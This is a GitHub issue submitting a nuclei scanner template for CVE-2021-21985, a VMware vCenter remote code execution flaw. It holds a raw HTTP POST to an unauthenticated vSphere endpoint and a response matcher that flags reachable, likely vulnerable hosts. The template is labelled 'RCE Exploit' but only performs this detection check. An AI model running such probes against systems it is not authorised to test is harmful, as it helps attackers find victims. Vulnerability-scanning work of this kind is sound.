### ISSUE TITLE
[nuclei-template] CVE-2021-21985

### ISSUE THREAD

**Issue by dorkerdevil** [projectdiscovery/nuclei-templates#1589]
**Template Details**
VMware vCenter Server CVE-2021-21985 Remote Code Execution Vulnerability.
```yaml

id: CVE-2021-21985

info:
  name: CVE-2021-21985 RCE Exploit 
  author: @D0rkerDevil
  severity: CRITICAL
  description: |
    The vSphere Client (HTML5) contains a remote code execution vulnerability

  reference: |
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21985
  tags: RCE,vSphere

requests:
  - raw:
      - |
        POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        User-Agent: dorkerdevil123
        Content-Type: application/json
        Content-Length: 86
        Connection: close

        {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}

    matchers:
      - type: word
        words:
          - '{"result":{"isDisconnected":'
        part: body
```
